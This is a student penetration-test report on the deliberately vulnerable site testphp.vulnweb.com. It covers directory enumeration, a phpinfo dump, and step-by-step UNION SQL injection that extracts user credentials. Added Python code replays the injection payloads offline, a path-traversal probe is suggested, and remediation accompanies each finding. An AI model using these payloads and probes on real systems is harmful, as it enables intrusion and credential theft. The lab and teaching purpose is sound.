Final Report

Uploaded by: djamel lardjani

MINI PROJECT

Project 14 website: http://testphp.vulnweb.com/

SUBMITTED TO: IBM

SUBMITTED BY: NARENDRA PAL (GROUP-14), University Roll No. 181530023
ABSTRACT

Web applications are developed daily and used extensively, so it is important for developers and testers to
improve their security. Penetration testing is a technique that helps developers and testers confirm that the
security level of a Web application is acceptable before it is used. Many tools are available for pen testing
Web applications; in this report we used dirb, DirBuster, Gobuster, nmap, Nikto and Burp Suite to enumerate
vulnerabilities in the given Web site, http://testphp.vulnweb.com/.
Reconnaissance
Host Discovery
One of the very first steps in any network reconnaissance mission is to reduce a (sometimes huge) set of IP
ranges into a list of active or interesting hosts. Scanning every port of every single IP address is slow and
usually unnecessary. Of course what makes a host interesting depends greatly on the scan purposes. Network
administrators may only be interested in hosts running a certain service, while security auditors may care about
every single device with an IP address. An administrator may be comfortable using just an ICMP ping to locate
hosts on his internal network, while an external penetration tester may use a diverse set of dozens of probes in
an attempt to evade firewall restrictions.

Nmap
Nmap is a network mapper that has emerged as one of the most popular, free network discovery tools on the
market. Nmap is now one of the core tools used by network administrators to map their networks. The program
can be used to find live hosts on a network, perform port scanning, ping sweeps, OS detection, and version
detection.
A number of recent cyberattacks have re-focused attention on the type of network auditing that Nmap provides.
Analysts have pointed out that the recent Capital One hack, for instance, could have been detected sooner if
system administrators had been monitoring connected devices.
Web Server Scanning with Nikto Scanner
There are a number of online vulnerability scanners for testing web applications on the Internet. For intranet
or in-house applications, however, the Nikto web scanner can be used.

Nikto is an open-source scanner that works with any web server (Apache, Nginx, IHS, OHS, LiteSpeed, etc.),
which makes it a good in-house tool for web server scanning. It checks for over 6700 items to detect
misconfigurations, risky files, etc. Some of its features include:

You can save the report in HTML, XML, CSV

It supports SSL

Scan multiple ports on the server

Find subdomain

Apache user enumeration

Checks for outdated components

Detect parking sites

Using Nikto in Kali Linux

Go to Applications >> Vulnerability Analysis and click nikto.


Directory scanning with gobuster, dirbuster and dirb
DIRB
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web objects by launching a dictionary-based
attack against a web server and analysing the responses.

DIRB comes with a set of preconfigured attack wordlists for easy usage, but custom wordlists can be used too.
DIRB can also sometimes be used as a classic CGI scanner, but remember that it is a content scanner, not a
vulnerability scanner.

DIRB's main purpose is to help in professional web application auditing, especially in security-related testing.
It covers some holes not covered by classic web vulnerability scanners: it looks for specific web objects that
generic CGI scanners cannot. It does not search for vulnerabilities, nor does it look for web content that might
be vulnerable.
DIRBUSTER
Some of the directories and files found during the DirBuster scan of the given website are as follows:

Directories found during testing:

Dirs found with a 200 response:

/images/

/admin/

/pictures/

/AJAX/

/Mod_Rewrite_Shop/

/hpp/

/Flash/

/Mod_Rewrite_Shop/images/

/secured/

Dirs found with a 403 response:

/cgi-bin/

Files found during testing:

Files found with a 200 response:

/index.php

/search.php

/login.php

/product.php

/disclaimer.php

/signup.php

/categories.php

/cart.php

/artists.php

/guestbook.php

/AJAX/index.php

/Mod_Rewrite_Shop/index.php

/Flash/add.swf

/hpp/index.php

/AJAX/categories.php

/Mod_Rewrite_Shop/buy.php
/Mod_Rewrite_Shop/details.php

/logout.php

/hpp/test.php

/404.php

/AJAX/titles.php

/Mod_Rewrite_Shop/rate.php

/AJAX/artists.php

/hpp/params.php

/secured/index.php

Files found with a 302 response:

/comment.php

/userinfo.php

/redir.php

GOBUSTER
One of the first steps in attacking a web application is enumerating hidden directories and files. Doing so
can often yield valuable information that makes it easier to execute a precise attack, leaving less room for
errors and wasted time. There are many tools available to do this, but not all of them are created equal.
Gobuster, a directory scanner written in Go, is definitely worth exploring.

Traditional directory brute-force scanners like DirBuster and DIRB work just fine, but can often be slow
and prone to errors. Gobuster is a Go implementation of these tools and is offered in a convenient
command-line format.

The main advantage Gobuster has over other directory scanners is speed. As a programming language, Go is
known to be fast. It also has excellent support for concurrency, so Gobuster can use multiple threads for
faster processing.

The one downside of Gobuster is the lack of recursive directory searching. For directories more than one
level deep, another scan is needed. Often this is not a big deal, and other scanners can fill in the gap.
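The following is an added example, not code from this report or from the DIRB, DirBuster or Gobuster projects. It shows the mechanism those tools share: each wordlist entry is requested, the HTTP status is recorded the way the DirBuster output above groups results (200, 403, redirect), and, unlike Gobuster, any directory that answers 200 is scanned again one level deeper. To run offline it serves a throw-away document tree from Python's own http.server; that tree, the wordlist and the localhost port are constructed for the demo and only loosely imitate paths seen on testphp.vulnweb.com.

```python
"""dirb/Gobuster-style content discovery with recursion (added example)."""
import functools
import http.server
import os
import shutil
import socketserver
import tempfile
import threading
import urllib.error
import urllib.request

# Constructed wordlist; real scans use lists of thousands of entries.
WORDLIST = ["admin", "images", "secured", "cgi-bin", "index.php",
            "login.php", "phpinfo.php", "backup", "test.php"]


class DemoHandler(http.server.SimpleHTTPRequestHandler):
    """Serve the demo tree; anything under /cgi-bin/ is forbidden (403)."""

    def do_GET(self):
        if self.path.startswith("/cgi-bin/"):
            self.send_error(403)
        else:
            super().do_GET()

    def log_message(self, *_):
        pass  # silence per-request logging


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 30x: the code itself is the signal we want to classify."""

    def redirect_request(self, *_):
        return None


def probe(base, path):
    """Request base+path and return the raw HTTP status code."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(base + path, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def scan(base, wordlist, prefix="/", depth=0, max_depth=2):
    """Return {path: status} for every wordlist entry that is not a 404.

    A 301/302 on /word means the server knows it as a directory; it is then
    re-probed as /word/ and, if that answers 200, scanned recursively.
    """
    hits = {}
    for word in wordlist:
        path = prefix + word
        status = probe(base, path)
        if status == 404:
            continue
        if status in (301, 302):
            path += "/"
            status = probe(base, path)
        hits[path] = status
        if status == 200 and path.endswith("/") and depth < max_depth:
            hits.update(scan(base, wordlist, path, depth + 1, max_depth))
    return hits


def build_demo_site():
    """Constructed document root with a few dirs/files named like the target's."""
    root = tempfile.mkdtemp(prefix="dirscan-demo-")
    for d in ("admin", "images", "secured", "cgi-bin"):
        os.makedirs(os.path.join(root, d))
    for f in ("index.php", "login.php", "admin/index.php", "secured/phpinfo.php"):
        with open(os.path.join(root, f), "w") as fh:
            fh.write("<?php /* placeholder */ ?>\n")
    return root


def run_demo():
    """Serve the demo tree on a random localhost port, scan it, tear it down."""
    root = build_demo_site()
    handler = functools.partial(DemoHandler, directory=root)
    httpd = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % httpd.server_address[1]
    try:
        return scan(base, WORDLIST)
    finally:
        httpd.shutdown()
        httpd.server_close()
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, status in sorted(run_demo().items()):
        print(status, path)
```

Against the demo tree the scan reports /admin/, /images/ and /secured/ with 200, /cgi-bin/ with 403, and, because it recursed, /admin/index.php and /secured/phpinfo.php; a 404 is never listed. The redirect handling matters in practice: following a 301 silently would make /admin and /admin/ look like one 200 and hide the redirect class DirBuster reports separately.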
PHP VERSION

URL: http://testphp.vulnweb.com/secured/phpinfo.php

Sensitive information:

This page outputs a large amount of information about the current state of PHP using the phpinfo() function.
This includes PHP compilation options and extensions, the PHP version, server information and environment
(if compiled as a module), the PHP environment, OS version information, paths, master and local values of
configuration options, HTTP headers, and the PHP License.

Remediation: remove the file from production systems.

The phpinfo output retrieved from the target follows.

PHP Version 5.1.6

System FreeBSD svn.local 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 10:40:27 UTC 2007 [email protected]:/usr/obj/usr/src/sys/GENERIC i386

Build Date Jul 30 2007 12:20:01

Configure Command './configure' '--enable-versioning' '--enable-memory-limit' '--with-layout=GNU' '--with-config-file-scan-dir=/usr/local/etc/php' '--disable-all' '--enable-libxml' '--with-libxml-dir=/usr/local' '--enable-reflection' '--enable-spl' '--program-prefix=' '--enable-fastcgi' '--with-apxs2=/usr/local/sbin/apxs' '--with-regex=php' '--with-zend-vm=CALL' '--disable-ipv6' '--prefix=/usr/local' 'i386-portbld-freebsd6.2'

Server API Apache 2.0 Handler

Virtual Directory Support Disabled

Configuration File (php.ini) Path /usr/local/etc/php.ini

Scan this dir for additional .ini files /usr/local/etc/php

Additional .ini files parsed /usr/local/etc/php/extensions.ini

PHP API 20041225

PHP Extension 20050922

Zend Extension 220051025

Debug Build No

Thread Safety Disabled

Zend Memory
Manager Enabled

IPv6 Support Disabled

Registered
PHP Streams php, file, http, ftp, https, ftps, compress.zlib

Registered
Stream Socket
Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls

Registered Stream Filters string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, convert.iconv.*, zlib.*

This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.1.0, Copyright (c) 1998-2006 Zend Technologies

PHP Credits
Configuration
PHP Core

Directive Local Value Master Value

allow_call_time_pass_reference On On

allow_url_fopen On On

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no value

Browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On On

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 2039 2039

expose_php On On

extension_dir /usr/local/lib/php/20050922 /usr/local/lib/php/20050922
file_uploads On On

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .: .:

log_errors Off Off

log_errors_max_len 1024 1024

magic_quotes_gpc Off Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.force_extra_parameters no value no value

max_execution_time 30 30

max_input_time 60 60

memory_limit 8M 8M

open_basedir no value no value

output_buffering no value no value

output_handler no value no value

post_max_size 8M 8M

precision 12 12

realpath_cache_size 16K 16K


realpath_cache_ttl 120 120

register_argc_argv On On

register_globals Off Off

register_long_arrays On On

report_memleaks On On

report_zend_debug On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path /usr/sbin/sendmail -t -i  /usr/sbin/sendmail -t -i 

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 2M 2M

upload_tmp_dir no value no value

user_dir no value no value

variables_order EGPCS EGPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.ze1_compatibility_mode Off Off

apache2handler
Apache Version Apache/2.2.3 (FreeBSD) DAV/2 PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.7e-p1

Apache API Version 20051115

Server Administrator [email protected]

Hostname:Port acuart:0

User/Group www(80)/80

Max Requests Per Child: 10000 - Keep Alive: on - Max Per Connection: 100

Timeouts Connection: 300 - Keep-Alive: 5

Virtual Server Yes

Server Root /usr/local

Loaded Modules core prefork http_core mod_so mod_authn_file mod_authn_dbm mod_authn_anon mod_authn_default mod_authn_alias mod_authz_host mod_authz_groupfile mod_authz_user mod_authz_dbm mod_authz_owner mod_authz_default mod_auth_basic mod_auth_digest mod_file_cache mod_cache mod_disk_cache mod_include mod_filter mod_charset_lite mod_deflate mod_log_config mod_logio mod_env mod_mime_magic mod_cern_meta mod_expires mod_headers mod_usertrack mod_setenvif mod_version mod_ssl mod_mime mod_dav mod_status mod_autoindex mod_asis mod_info mod_cgi mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_imagemap mod_actions mod_speling mod_userdir mod_alias mod_rewrite mod_php5

Directive Local Value Master Value

engine 1 1

last_modified 0 0

xbithack 0 0

ctype
ctype functions Enabled
curl
CURL support Enabled

CURL Information libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3

Directive Local Value Master Value

date.default_latitude 31.7667 31.7667

date.default_longitude 35.2333 35.2333

date.sunrise_zenith 90.583333 90.583333

date.sunset_zenith 90.583333 90.583333

date.timezone no value no value

dom
DOM/XML Enabled

DOM/XML API Version 20031129

libxml Version 2.6.26

HTML Support Enabled

XPath Support Enabled

XPointer Support Enabled

Schema Support Enabled

RelaxNG Support Enabled

exif
EXIF Support Enabled

EXIF Version 1.4 $Id: exif.c,v 1.173.2.5 2006/04/10 18:23:24 helly Exp $

Supported EXIF Version 0220

Supported filetypes JPEG,TIFF

ftp
FTP support Enabled

gd
GD Support Enabled

GD Version bundled (2.0.28 compatible)

FreeType Support Enabled

FreeType Linkage with freetype

FreeType Version 2.2.1

T1Lib Support Enabled

GIF Read Support Enabled

GIF Create Support Enabled

JPG Support Enabled

PNG Support Enabled

WBMP Support Enabled

XPM Support Enabled

XBM Support Enabled

libxml
libXML support Active

libXML Version 2.6.26

libXML streams Enabled

mssql
MSSQL Support enabled

Active Persistent Links 0

Active Links 0

Library version FreeTDS

mysql
MySQL Support enabled

Active Persistent Links 0

Active Links 0

Client API version 5.1.11-beta

MYSQL_MODULE_TYPE no value

MYSQL_SOCKET /tmp/mysql.sock

MYSQL_INCLUDE no value

MYSQL_LIBS no value

Directive Local Value Master Value

mysql.allow_persistent On On

mysql.connect_timeout 60 60

mysql.default_host no value no value

mysql.default_password no value no value

mysql.default_port no value no value

mysql.default_socket no value no value

mysql.default_user no value no value

mysql.max_links Unlimited Unlimited

mysql.max_persistent Unlimited Unlimited

mysql.trace_mode Off Off

openssl
OpenSSL support Enabled

OpenSSL Version OpenSSL 0.9.7e-p1 25 Oct 2004

posix
Revision $Revision: 1.70.2.3 $

Reflection
Reflection Enabled

Version $Id: php_reflection.c,v 1.164.2.33 2006/03/29 14:28:42 tony2001 Exp $

session
Session Support Enabled

Registered save handlers files user

Registered serializer handlers php php_binary

Directive Local Value Master Value

session.auto_start Off Off

session.bug_compat_42 On On

session.bug_compat_warn On On

session.cache_expire 180 180

session.cache_limiter nocache nocache

session.cookie_domain no value no value

session.cookie_lifetime 0 0

session.cookie_path / /

session.cookie_secure Off Off

session.entropy_file no value no value

session.entropy_length 0 0

session.gc_divisor 100 100

session.gc_maxlifetime 1440 1440

session.gc_probability 1 1

session.hash_bits_per_character 4 4

session.hash_function 0 0

session.name PHPSESSID PHPSESSID

session.referer_check no value no value

session.save_handler files files

session.save_path no value no value


session.serialize_handler php php

session.use_cookies On On

session.use_only_cookies Off Off

session.use_trans_sid 0 0

SQLite
SQLite support Enabled

PECL Module version 2.0-dev $Id: sqlite.c,v 1.166.2.13 2006/04/18 14:30:15 iliaa Exp $

SQLite Library 2.8.17

SQLite Encoding iso8859

Directive Local Value Master Value

sqlite.assoc_case 0 0

standard
Regex Library Bundled library enabled

Dynamic Library Support Enabled

Path to sendmail /usr/sbin/sendmail -t -i

Directive Local Value Master Value

assert.active 1 1

assert.bail 0 0

assert.callback no value no value

assert.quiet_eval 0 0

assert.warning 1 1
auto_detect_line_endings 0 0

default_socket_timeout 60 60

safe_mode_allowed_env_vars PHP_ PHP_

safe_mode_protected_env_vars LD_LIBRARY_PATH LD_LIBRARY_PATH

url_rewriter.tags a=href,area=href,frame=src,input=src,form=,fieldset= a=href,area=href,frame=src,input=src,form=,fieldset=

user_agent no value no value

xml
XML Support active

XML Namespace Support active

libxml2 Version 2.6.26

xmlreader
XMLReader Enabled

xmlwriter
XMLWriter Enabled

xsl
XSL enabled

libxslt Version 1.1.17

libxslt compiled against libxml Version 2.6.26

EXSLT enabled

libexslt Version 1.1.17

Additional Modules
Module Name

Environment
Variable Value

LD_LIBRARY_PATH /usr/local/lib:

HOME /

PATH /sbin:/bin:/usr/sbin:/usr/bin

PHP Variables
Variable Value

_SERVER["HTTP_HOST"] Acuart

_SERVER["HTTP_USER_AGENT"] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

_SERVER["HTTP_ACCEPT"] text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

_SERVER["HTTP_ACCEPT_LANGUAGE"] en-us,en;q=0.5

_SERVER["HTTP_ACCEPT_ENCODING"] gzip,deflate

_SERVER["HTTP_ACCEPT_CHARSET"] ISO-8859-1,utf-8;q=0.7,*;q=0.7

_SERVER["HTTP_KEEP_ALIVE"] 300

_SERVER["HTTP_CONNECTION"] keep-alive

_SERVER["PATH"] /sbin:/bin:/usr/sbin:/usr/bin

_SERVER["SERVER_SIGNATURE"] no value

_SERVER["SERVER_SOFTWARE"] Apache/2.2.3 (FreeBSD) DAV/2 PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.7e-p1

_SERVER["SERVER_NAME"] Acuart

_SERVER["SERVER_ADDR"] 192.168.0.5

_SERVER["SERVER_PORT"] 80

_SERVER["REMOTE_ADDR"] 192.168.0.26

_SERVER["DOCUMENT_ROOT"] /var/www/acuart/

_SERVER["SERVER_ADMIN"] [email protected]

_SERVER["SCRIPT_FILENAME"] /var/www/acuart/secured/phpinfo.php

_SERVER["REMOTE_PORT"] 11493

_SERVER["GATEWAY_INTERFACE"] CGI/1.1

_SERVER["SERVER_PROTOCOL"] HTTP/1.1

_SERVER["REQUEST_METHOD"] GET

_SERVER["QUERY_STRING"] no value

_SERVER["REQUEST_URI"] /secured/phpinfo.php

_SERVER["SCRIPT_NAME"] /secured/phpinfo.php

_SERVER["PHP_SELF"] /secured/phpinfo.php

_SERVER["REQUEST_TIME"] 1201867164

_SERVER["argv"] Array

_SERVER["argc"] 0

_ENV["LD_LIBRARY_PATH"] /usr/local/lib:

_ENV["HOME"] /

_ENV["PATH"] /sbin:/bin:/usr/sbin:/usr/bin
PHP License
This program is free software; you can redistribute it and/or modify it under the
terms of the PHP License as published by the PHP Group and included in the
distribution in the file: LICENSE
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
If you did not receive a copy of the PHP license, or have any questions about
PHP licensing, please contact [email protected].
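A phpinfo dump is only useful to a tester if the risky settings are picked out of the hundreds of lines above. The following is an added example, not code from this report: it parses lines of the form "directive local-value master-value" exactly as they appear in the dump and flags the ones that matter for an attacker, together with the PHP version. The sample text is a constructed excerpt copying values from the dump (PHP 5.1.6, display_errors On, expose_php On, session.cookie_secure Off, and so on); the choice of which directives count as risky, and the reasons given, are this example's own judgement.

```python
"""Triage of a phpinfo() dump for risky settings (added example)."""
import re

# directive -> (value that constitutes a finding, why it matters to an attacker)
RISKY = {
    "display_errors": ("On", "PHP/SQL errors with file paths reach the client (this is what made SQLi step 2 visible)"),
    "expose_php": ("On", "X-Powered-By header advertises the exact PHP version"),
    "allow_url_fopen": ("On", "file functions accept http:// URLs; before PHP 5.2 this also governed include()"),
    "enable_dl": ("On", "scripts can dl() arbitrary extensions at runtime"),
    "register_globals": ("On", "request parameters become global variables"),
    "log_errors": ("Off", "errors are shown to users but never logged for the defender"),
    "disable_functions": ("no value", "no dangerous functions (exec, system, ...) are disabled"),
    "open_basedir": ("no value", "PHP may open any path the web server user can read"),
    "session.cookie_secure": ("Off", "PHPSESSID is sent over plain HTTP"),
    "session.use_only_cookies": ("Off", "session id is accepted from the URL, enabling fixation"),
}

# Constructed excerpt; values copied from the dump above.
SAMPLE_PHPINFO = """\
PHP Version 5.1.6
allow_url_fopen On On
disable_functions no value no value
display_errors On On
enable_dl On On
expose_php On On
log_errors Off Off
open_basedir no value no value
register_globals Off Off
session.cookie_secure Off Off
session.use_only_cookies Off Off
"""


def parse_directives(text):
    """Map directive -> local value. 'no value' is how phpinfo renders an unset directive."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"PHP Version (\S+)", line)
        if m:
            cfg["PHP Version"] = m.group(1)
            continue
        if line.endswith("no value no value"):
            cfg[line[: -len("no value no value")].strip()] = "no value"
            continue
        parts = line.split()
        if len(parts) == 3:  # directive local master
            cfg[parts[0]] = parts[1]
    return cfg


def audit(text):
    """Return [(directive, value, reason)] for every risky setting present."""
    cfg = parse_directives(text)
    findings = []
    ver = cfg.get("PHP Version")
    if ver and int(ver.split(".")[0]) < 7:
        findings.append(("PHP Version", ver, "PHP 5.x has received no security fixes since December 2018"))
    for name, (bad, why) in RISKY.items():
        if cfg.get(name) == bad:
            findings.append((name, bad, why))
    return findings


if __name__ == "__main__":
    for name, value, why in audit(SAMPLE_PHPINFO):
        print(f"{name:26} {value:9} {why}")
```

Run on the sample, every directive except register_globals (which the dump shows as Off) is flagged, plus the version. The parser deliberately takes the local value, not the master: a per-directory php_admin_value can differ from php.ini, and the local column is what the script that rendered the page actually ran under.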

WEB VULNERABILITIES
On scanning the given website we found many web vulnerabilities; some are listed below.

1. SQL INJECTION
Description: SQL injection (SQLi) is a type of web application vulnerability in which an attacker can manipulate
and submit a SQL command to retrieve database information. It occurs when a web application builds a query
from user-provided data without validating or encoding it.
This attack can give access to sensitive information such as customer records, credit card numbers, trade
secrets and personal data.
It also allows an attacker to add, modify and delete data stored in the database.

How to Perform This Attack?

Steps to follow (performed on the intentionally vulnerable page
http://testphp.vulnweb.com/listproducts.php?cat=1; the report's screenshots are not reproduced here):

1. Open the above link in the Firefox browser.

2. To test whether the page is vulnerable to SQL injection, append a single quote (') to the cat value in the URL.

   A database error is returned. The quote reached the SQL query unescaped, so the page is vulnerable to SQL
   injection.

3. To find how many columns the query selects, append ORDER BY n and raise n until the page errors.

   ORDER BY 11 succeeds and ORDER BY 12 fails, so the query selects 11 columns.

4. To find which columns are reflected in the page, use a UNION SELECT with 11 numbered columns.

   Columns 7 and 9 are rendered in the page, so data placed in those positions will be displayed.

5. To learn the database name, put database() in one of the reflected positions.

   The database name is acuart.

6. To list the tables in that database, select the table names from the database's schema catalogue
   (information_schema in MySQL) in a reflected position.

   Several tables are returned; the users table is the most useful to us.

7. To list the column names of the users table, select the column names from the schema catalogue in the
   same way.

   These columns are where the sensitive information lives.

8. To fetch the data, select those columns from the users table in the reflected positions.

   The username and password of a user are displayed. This completes the UNION-based extraction; no
   password guessing was needed.

Remediation
1. Validate input against an allow-list (whitelist) rather than a deny-list wherever practicable; here cat should
   be accepted only as an integer.
2. Do not build SQL queries by string concatenation. Use prepared statements (parameterised queries) or
   stored procedures instead.
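The eight steps above are replayed below against an in-memory stand-in, as an added example that is not the report's code and not the real listproducts.php. The vulnerable function mirrors what the steps imply about the target: the cat parameter is concatenated into the query, the products query selects 11 columns, and only columns 7 and 9 are rendered. The schema, rows and the test:test credentials are constructed for the demo. SQLite is used so the example runs offline; where the report uses MySQL's database() and information_schema, the payloads here read sqlite_master instead (SQLite has no database() function, so step 5 is not reproduced). The remediation follows both points above: the value is accepted only as an integer and then bound as a parameter.

```python
"""UNION-based SQL injection replayed offline, and its fix (added example)."""
import sqlite3


def build_db():
    """Constructed stand-in for the acuart schema: 11-column products table plus users."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id, cat, name, artist, price, rating, descr, img, notes, stock, added);
        CREATE TABLE users(uname, pass, email);
        INSERT INTO products VALUES (1, 1, 'Sunset', 'Blad', 12, 5, 'oil on canvas', '1.jpg', 'framed', 3, '2004');
        INSERT INTO users VALUES ('test', 'test', 'test@example.com');
    """)
    return con


def list_products_vulnerable(con, cat):
    """The bug: user input concatenated straight into SQL, as the target page does."""
    sql = "SELECT * FROM products WHERE cat=" + cat
    rows = con.execute(sql).fetchall()
    # The page template renders only columns 7 and 9 (1-based), which is why the
    # report observes that "7 and 9 are vulnerable": only those positions show data.
    return [(row[6], row[8]) for row in rows]


def list_products_safe(con, cat):
    """Remediation: allow-list the type (integer only), then bind it as a parameter."""
    try:
        cat_id = int(cat)
    except ValueError:
        raise ValueError("cat must be an integer") from None
    rows = con.execute("SELECT * FROM products WHERE cat=?", (cat_id,)).fetchall()
    return [(row[6], row[8]) for row in rows]


# The report's steps as payloads for the cat parameter (step 5 omitted, see lead-in).
NUMBERED = "1,2,3,4,5,6,7,8,9,10,11"
STEPS = [
    ("2 quote",      "1'"),
    ("3 orderby 11", "1 ORDER BY 11"),
    ("3 orderby 12", "1 ORDER BY 12"),
    ("4 union",      "-1 UNION SELECT " + NUMBERED),
    ("6 tables",     "-1 UNION SELECT 1,2,3,4,5,6,"
                     "(SELECT group_concat(name) FROM sqlite_master WHERE type='table'),8,9,10,11"),
    ("7 columns",    "-1 UNION SELECT 1,2,3,4,5,6,"
                     "(SELECT sql FROM sqlite_master WHERE name='users'),8,9,10,11"),
    ("8 dump",       "-1 UNION SELECT 1,2,3,4,5,6,"
                     "(SELECT group_concat(uname || ':' || pass) FROM users),8,9,10,11"),
]


def run_attack(con):
    """Run every payload; errors are returned as strings because they are the signal in steps 2 and 3."""
    results = {}
    for label, payload in STEPS:
        try:
            results[label] = list_products_vulnerable(con, payload)
        except sqlite3.OperationalError as err:
            results[label] = "ERROR: " + str(err)
    return results


if __name__ == "__main__":
    db = build_db()
    for label, out in run_attack(db).items():
        print(label, "->", out)
    print("safe handler, cat=1 ->", list_products_safe(db, "1"))
```

The quote and ORDER BY 12 payloads produce database errors, ORDER BY 11 returns the normal row, the plain UNION shows (7, 9) in the two rendered positions, and the last three payloads put the table list, the users DDL and finally test:test into position 7. The safe version rejects every one of the injection payloads before any SQL is built, which is the property prepared statements alone cannot give you for a value that must be numeric.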

2. File Inclusion
A file inclusion vulnerability allows an attacker to include a file, usually by exploiting a "dynamic file inclusion"
mechanism implemented in the target application. The vulnerability occurs because user-supplied input is used
without proper validation.

At best this only outputs the contents of the file, but depending on the severity it can also lead to:
1. Code execution on the web server
2. Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site
   scripting (XSS)
3. Denial of Service (DoS)
4. Sensitive information disclosure

Local file inclusion (LFI) is the inclusion of files that are already present on the server, by exploiting
vulnerable inclusion procedures in the application. It occurs, for example, when a page receives as input the
path of the file to include and that input is not properly sanitised, allowing directory traversal sequences
(dot-dot-slash) to be injected.

Parameter tested:
/showimage.php?file=./pictures/7.jpg
URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg

Steps:
1. Open the page and intercept the request in Burp Suite; the parameter to modify is file=.
2. Send the request to Repeater and change the file path to check whether the parameter includes arbitrary
   content.
3. Apply this payload as the value of file:

<iframe src="https://www.3schools.com"> </iframe>

Modified request and response: (screenshots not reproduced)

The response is a warning that the file could not be accessed, so this payload was not included. Two caveats:
the report's original heading called this a "file upload" test, but what is being exercised is file inclusion, and an
HTML iframe is not a meaningful inclusion payload because the parameter expects a path. The standard LFI
probe is a traversal path to a file known to exist on the server (for example ../../../etc/passwd on a Unix host),
which this report did not try, so the absence of a finding here is not evidence that the parameter is safe.

Remediation
Because the root cause is improper input validation, the fixes revolve around validating the received file name:
1. Accept only letters and digits (A-Z, 0-9) plus a single expected extension in file names, rather than trying
   to blacklist dangerous characters.
2. Resolve the final path and allow inclusion only from one designated directory, so that directory traversal is
   also prevented.
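Both remediations are shown in code below, as an added example that is not the target's showimage.php. show_image_vulnerable() does what the LFI description above warns about, joining the user-supplied path onto the web root unchecked; show_image_safe() applies the allow-list of A-Z 0-9 names and the single permitted directory, enforcing the latter on the resolved real path so that a symlink planted inside the directory cannot escape either. The document root, the image bytes and the database_connect.php "secret" are constructed for the demo.

```python
"""Path handling behind a showimage.php?file= style parameter (added example)."""
import os
import re
import tempfile

# Allow-list: a plain name and one image extension. No traversal characters can match.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+\.(jpg|jpeg|png|gif)")


def show_image_vulnerable(root, file):
    """Bug: os.path.join follows '..' and even discards root when given an absolute path."""
    with open(os.path.join(root, file), "rb") as fh:
        return fh.read()


def show_image_safe(root, file):
    """Reject anything but a plain image name, then prove the resolved path stays in pictures/."""
    if not SAFE_NAME.fullmatch(file):
        raise ValueError("file name not in allow-list")
    pictures = os.path.realpath(os.path.join(root, "pictures"))
    target = os.path.realpath(os.path.join(pictures, file))
    # realpath resolves symlinks, so the directory check holds even for a planted link
    if os.path.commonpath([pictures, target]) != pictures:
        raise ValueError("path escapes the image directory")
    with open(target, "rb") as fh:
        return fh.read()


def build_demo_root():
    """Constructed web root: pictures/7.jpg plus a file that must never be served."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    os.makedirs(os.path.join(root, "pictures"))
    with open(os.path.join(root, "pictures", "7.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0JFIF-placeholder")
    with open(os.path.join(root, "database_connect.php"), "wb") as fh:
        fh.write(b"<?php $db_pass = 'constructed-secret'; ?>")
    try:  # planted symlink: passes the name allow-list but resolves outside pictures/
        os.symlink(os.path.join(root, "database_connect.php"),
                   os.path.join(root, "pictures", "leak.jpg"))
    except OSError:
        pass  # platforms without symlink support just skip this case
    return root


def demo():
    """Run a legitimate name and three hostile ones through both handlers."""
    root = build_demo_root()
    results = {
        "legit_vuln": show_image_vulnerable(root, "./pictures/7.jpg"),
        "traversal_vuln": show_image_vulnerable(root, "pictures/../database_connect.php"),
        "legit_safe": show_image_safe(root, "7.jpg"),
    }
    for label, bad in (("traversal_safe", "pictures/../database_connect.php"),
                       ("absolute_safe", "/etc/passwd"),
                       ("symlink_safe", "leak.jpg")):
        try:
            show_image_safe(root, bad)
            results[label] = "SERVED"
        except (ValueError, FileNotFoundError) as err:
            results[label] = "rejected: " + str(err)
    return results


if __name__ == "__main__":
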